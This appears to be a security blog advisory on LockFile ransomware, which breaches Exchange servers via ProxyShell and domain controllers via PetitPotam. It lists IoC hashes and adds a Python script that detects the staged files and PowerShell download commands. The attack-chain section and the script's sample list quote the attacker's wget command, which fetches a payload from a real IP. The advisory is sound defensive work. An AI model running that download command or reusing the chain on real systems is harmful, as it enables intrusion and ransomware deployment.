How Does the New LockFile Ransomware Compromise the Domain Controller? And How Should You Protect?
New LockFile Ransomware

Researchers have observed a new ransomware family, dubbed “LockFile,” targeting unpatched Microsoft Exchange servers. The threat actors gain access to the victim’s network through Exchange by chaining the three Microsoft Exchange vulnerabilities tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207 (the ProxyShell chain); successful exploitation of these vulnerabilities results in unauthenticated remote code execution. After compromising the Exchange server, the actors use the PetitPotam vulnerability to take over the Windows domain and encrypt the compromised systems. It is therefore important to understand how LockFile compromises the domain controller and how to protect Exchange servers from it.

Victims Of The New LockFile Ransomware

This new LockFile ransomware has compromised at least 10 businesses in the ongoing campaign. At the time of writing, the campaign does not appear to focus on one specific target; victims span various sectors around the globe: manufacturing, engineering, business services, legal, financial services, travel, and tourism.

When Was The New LockFile Ransomware Seen?

LockFile is a newly discovered ransomware family. It was first seen on July 20, 2021, on the network of a U.S. Its first action was recorded as recently as August 20. However, comprehensive analysis is still underway, and more will become known about the ransomware as the analysis progresses. You can track the updates here.

The LockFile Ransom Note:

Like other ransomware, LockFile leaves the victim a ransom note with standard instructions and contact information.


Figure 1. The LockFile ransom note

How Does The New LockFile Ransomware Compromise The Victim?

In the previous sections, we looked at the new LockFile ransomware and its victims. In this section, we will see how LockFile ransomware compromises the victim.

  1. The initial attack vector is still unknown. However, researchers suspect that the threat actors used the ProxyShell vulnerability chain, tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, to compromise the Exchange servers.
  2. Once the actor compromises the Exchange server, they run wget commands in PowerShell to download unknown files from the IP address 209.14.0[.]234:
     > wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH
  3. Typically, 20 to 30 minutes before installing the ransomware, the actor places a set of tools on the compromised Exchange server: efspotato.exe (an exploit for the CVE-2021-36942 vulnerability), active_desktop_render.dll, and active_desktop_launcher.exe.
  4. The actor uses active_desktop_launcher.exe, a legitimate KuGou Active Desktop binary, to load active_desktop_render.dll. The DLL then decrypts a file in the local directory called ‘desktop.ini’, which contains shellcode. Further analysis is yet to be done to reveal more information about ‘desktop.ini’.
  5. The shellcode inside desktop.ini activates efspotato.exe, which carries the exploit for the PetitPotam NTLM relay attack.
  6. After successfully exploiting the PetitPotam vulnerability against the local domain controllers, the actor copies the LockFile ransomware binary, a batch file, and supporting executables onto the compromised domain controllers under the ‘sysvol\domain\scripts’ directory.
  7. Files inside the ‘sysvol’ directory:
    1. Autologin.bat
    2. Autologin.exe
    3. Autologin.dll
    4. Autologin.sys
    5. Autoupdate.exe
  8. LockFile then copies the batch scripts and other executables inside the “sysvol\domain\scripts” directory to clients when they try to authenticate with the domain controller.

How Should You Protect Domain Controllers From the New LockFile Ransomware?

  1. Keep the operating system updated to the currently released patch level, since LockFile targets victims through the Microsoft Exchange ProxyShell vulnerabilities and the Windows PetitPotam NTLM relay vulnerability.
  2. Check for the presence of the attack indicators in your network and deploy detection rules at the network and endpoint levels. Block the IoCs listed in this advisory.
  3. Keep anti-malware solutions at the endpoint and network level updated at all times.
  4. Deploy Endpoint Detection & Response (EDR) tools to detect the latest malware and suspicious activities on endpoints.

Indicators Of Compromise (IoC) Of The New LockFile Ransomware:

IP address: 209.14.0.234

File hash (SHA-256)                                               Description
ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291  active_desktop_render.dll
cafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915  autoupdate.exe
36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9  autologin.sys
5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f  autologin.exe
1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75  autologin.dll
2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a  autoupdate.exe
7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd  efspotato.exe
c020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153  active_desktop_render.dll
a926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0  autoupdate.exe
368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690  autologin.sys
d030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a  autoupdate.exe
a0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8  autoupdate.exe
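The following script is an added example for this post, not code from the original article or from any LockFile analysis; it shows how a defender could turn the attack chain above (the wget download from 209.14.0[.]234 and the staging of Autologin/Autoupdate files under sysvol\domain\scripts) and the IoC table into two concrete checks. It hashes every file under a directory (for instance a copy of the domain controller's SYSVOL scripts folder) against the SHA-256 list above and flags files whose names match the staged set, and it scans PowerShell command lines for wget/curl/Invoke-WebRequest downloads from an IP address, accepting the defanged hxxp:// and [.] spellings so advisory text can be fed in unchanged. The function names, the temporary directory, and the three sample command lines are assumptions made for the demo (only the first command line is the one quoted in the post; the files written to disk are constructed and contain no malware).

```python
import hashlib
import os
import re
import tempfile

# SHA-256 -> filename pairs copied from the IoC table above.
LOCKFILE_HASHES = {
    "ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291": "active_desktop_render.dll",
    "cafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915": "autoupdate.exe",
    "36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9": "autologin.sys",
    "5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f": "autologin.exe",
    "1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75": "autologin.dll",
    "2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a": "autoupdate.exe",
    "7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd": "efspotato.exe",
    "c020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153": "active_desktop_render.dll",
    "a926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0": "autoupdate.exe",
    "368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690": "autologin.sys",
    "d030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a": "autoupdate.exe",
    "a0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8": "autoupdate.exe",
}
LOCKFILE_IP = "209.14.0.234"  # download source seen in step 2 of the attack chain
# Names the actor stages under sysvol\domain\scripts on the domain controller.
STAGED_NAMES = {"autologin.bat", "autologin.exe", "autologin.dll",
                "autologin.sys", "autoupdate.exe"}

# wget/curl/iwr/Invoke-WebRequest followed by an IPv4 URL. The defanged
# hxxp:// and [.] spellings are accepted so advisory text can be fed in as-is.
DOWNLOAD_RE = re.compile(
    r"\b(?:wget|curl|iwr|Invoke-WebRequest)\b.*?"
    r"(?:hxxp|http)s?://(\d{1,3}(?:(?:\.|\[\.\])\d{1,3}){3})",
    re.IGNORECASE,
)

def sha256_of(path):
    """Hex SHA-256 of a file, read in 64 KiB chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_directory(root, known_hashes=LOCKFILE_HASHES):
    """Return (path, reason) for files whose hash is known or whose name is in the staged set."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            digest = sha256_of(path)
            if digest in known_hashes:
                findings.append((path, "sha256 matches " + known_hashes[digest]))
            elif name.lower() in STAGED_NAMES:
                findings.append((path, "filename matches LockFile staging set"))
    return findings

def scan_command_lines(lines):
    """Return (line, ip, is_lockfile_ip) for every download command found."""
    hits = []
    for line in lines:
        m = DOWNLOAD_RE.search(line)
        if m:
            ip = m.group(1).replace("[.]", ".")  # re-fang the address
            hits.append((line.strip(), ip, ip == LOCKFILE_IP))
    return hits

# Constructed PowerShell command lines for the demo; only the first is the
# command quoted in the advisory, the other two are benign filler.
SAMPLE_COMMANDS = [
    "wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH",
    "Invoke-WebRequest http://10.0.0.5/update.msi -OutFile C:\\temp\\update.msi",
    "Get-ChildItem C:\\Windows\\SYSVOL\\domain\\scripts",
]

def demo():
    """Stage a constructed directory, run both checks, return (file findings, command hits)."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "autologin.bat"), "w") as f:
            f.write("echo constructed sample\n")  # flagged by name only
        with open(os.path.join(root, "readme.txt"), "w") as f:
            f.write("benign\n")  # not flagged
        sample = os.path.join(root, "sample.bin")
        with open(sample, "wb") as f:
            f.write(b"constructed sample body")
        # Add the constructed file's digest to a copy of the list so the hash
        # path is exercised without a real LockFile binary on disk.
        known = dict(LOCKFILE_HASHES)
        known[sha256_of(sample)] = "constructed-sample"
        findings = scan_directory(root, known)
    return findings, scan_command_lines(SAMPLE_COMMANDS)

if __name__ == "__main__":
    files, commands = demo()
    for path, reason in files:
        print("FILE", path, "->", reason)
    for line, ip, known_ip in commands:
        print("CMD ", ip, "(LockFile IP)" if known_ip else "", "<-", line)
```

In PowerShell, wget, curl and iwr are all aliases of Invoke-WebRequest, which is why the pattern accepts all four spellings. The name-based check is deliberately separate from the hash check: the hash list covers the samples seen so far, while an Autologin.bat or Autoupdate.exe appearing in the SYSVOL scripts folder is worth a look regardless of its hash. Feed scan_command_lines with the ScriptBlockText from PowerShell event 4104 or with process-creation command lines from your EDR.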

Thanks for reading this threat post. Please make sure you are protected from the new LockFile ransomware and share this post to protect others.

About the author

Arun KL

Hi All, I am Arun KL, an IT Security Professional and founder of “thesecmaster.com”. Enthusiast, Security Blogger, Technical Writer, Editor, Author at TheSecMaster. To know more about me, follow me on LinkedIn.
